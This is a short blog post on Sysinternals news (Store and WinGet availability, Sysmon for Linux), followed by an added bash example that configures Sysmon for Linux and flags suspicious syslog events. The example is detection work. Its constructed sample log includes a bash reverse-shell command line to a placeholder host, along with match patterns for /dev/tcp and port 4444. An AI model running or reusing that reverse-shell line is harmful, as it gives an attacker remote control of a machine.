The great thing is that there is some new development. But first: what is Sysinternals exactly?
Sysinternals is a suite of advanced utilities for Windows and Windows Server. Mark Russinovich started the initiative about 25 years ago; nowadays he works for Microsoft as the Azure CTO. Famous utilities are ProcMon (short for Process Monitor), Sysmon (short for System Monitor), PsExec (run a process on a local or remote machine as another user or as SYSTEM, notoriously used by attackers for lateral movement, but a Swiss army knife for sysadmins nonetheless) and BgInfo (show system information on the desktop background). RDCMan, a popular remote desktop utility used by sysadmins and the like for managing many RDP connections, was recently adopted into Sysinternals.
And now the great news:
- The Sysinternals Suite is available in the Microsoft Store. The added benefit is easier update management: the Store keeps the tools up to date for you.
- Not only that, it is also available through WinGet, Microsoft's package manager for Windows. Although WinGet is still in preview, it sounds promising.
- There is a Linux version of Sysmon, Sysmon for Linux, and there is even an option to forward its events to Azure Sentinel. ProcMon and ProcDump were already available for Linux. I'm expecting more utilities to be ported to Linux.
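Sysmon for Linux in practice, as an added example that is not part of the original post or of the Sysinternals project: a minimal configuration that logs every process creation plus network connections to two ports, and a small detection pass over syslog lines. It assumes the `sysmonforlinux` package from packages.microsoft.com, loading the configuration with `sudo sysmon -accepteula -i sysmon.xml`, and that Sysmon for Linux writes each event to syslog as one line of event XML after a `sysmon:` tag. The log lines, the two ports and the `/dev/tcp` pattern are constructed for the demonstration, not captured from a real system.

```bash
#!/usr/bin/env bash
# Added example (not from the original post or the Sysinternals project).
# Assumptions: Sysmon for Linux is installed from packages.microsoft.com as
# the "sysmonforlinux" package, is loaded with "sudo sysmon -accepteula -i
# sysmon.xml", and writes every event to syslog as one line of the form
# "<date> <host> sysmon: <Event>...</Event>". The ports and the pattern
# below are a hypothetical choice for the demonstration.
set -eu

# Write a minimal Sysmon configuration: log every process creation
# (exclude nothing) but only network connections to two ports of interest.
write_sysmon_config() {
  cat > "$1" <<'EOF'
<Sysmon schemaversion="4.81">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="exclude"/>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <DestinationPort condition="is">22</DestinationPort>
        <DestinationPort condition="is">4444</DestinationPort>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
EOF
}

# Extract the EventID (1 = process create, 3 = network connect) from one line.
sysmon_event_id() {
  printf '%s\n' "$1" | sed -n 's/.*<EventID>\([0-9]*\)<\/EventID>.*/\1/p'
}

# Extract one EventData field (e.g. Image, CommandLine, DestinationPort).
sysmon_field() {
  printf '%s\n' "$1" | sed -n "s/.*<Data Name=\"$2\">\([^<]*\)<\/Data>.*/\1/p"
}

# Read syslog lines on stdin and print one ALERT line per match:
#  - EventID 1 whose command line uses bash's /dev/tcp (reverse-shell idiom);
#  - EventID 3 with destination port 4444.
# Lines that are not Sysmon events are skipped.
scan_sysmon_log() {
  local line id
  while IFS= read -r line; do
    case "$line" in *' sysmon: <Event>'*) ;; *) continue ;; esac
    id=$(sysmon_event_id "$line")
    if [ "$id" = 1 ]; then
      case "$(sysmon_field "$line" CommandLine)" in
        */dev/tcp/*) echo "ALERT: /dev/tcp in command line of $(sysmon_field "$line" Image)" ;;
      esac
    elif [ "$id" = 3 ]; then
      if [ "$(sysmon_field "$line" DestinationPort)" = 4444 ]; then
        echo "ALERT: outbound connection to port 4444 from $(sysmon_field "$line" Image)"
      fi
    fi
  done
}

# Constructed sample lines (abbreviated event XML, not real captured output).
# "&gt;" and "&amp;" are what XML escaping makes of ">" and "&" in a command line.
SAMPLE_LOG='Oct 14 10:00:01 host sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID></System><EventData><Data Name="Image">/usr/bin/ls</Data><Data Name="CommandLine">ls -la</Data></EventData></Event>
Oct 14 10:00:02 host sshd[123]: Accepted publickey for alice from 192.0.2.5 port 51234 ssh2
Oct 14 10:00:03 host sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID></System><EventData><Data Name="Image">/usr/bin/bash</Data><Data Name="CommandLine">bash -i &gt;&amp; /dev/tcp/192.0.2.10/4444 0&gt;&amp;1</Data></EventData></Event>
Oct 14 10:00:04 host sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>3</EventID></System><EventData><Data Name="Image">/usr/bin/curl</Data><Data Name="DestinationIp">203.0.113.7</Data><Data Name="DestinationPort">443</Data></EventData></Event>
Oct 14 10:00:05 host sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>3</EventID></System><EventData><Data Name="Image">/usr/bin/bash</Data><Data Name="DestinationIp">192.0.2.10</Data><Data Name="DestinationPort">4444</Data></EventData></Event>'

# Number of alerts raised for the sample (expected: 2).
count_alerts() {
  printf '%s\n' "$SAMPLE_LOG" | scan_sysmon_log | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | scan_sysmon_log
```

On a real host the same `sysmon:` lines land in `/var/log/syslog` (or the journal), which is also where a syslog forwarder picks them up for Azure Sentinel; the `sed` extraction here is deliberately minimal and assumes one event per line, so for anything beyond a demonstration use a proper XML parser.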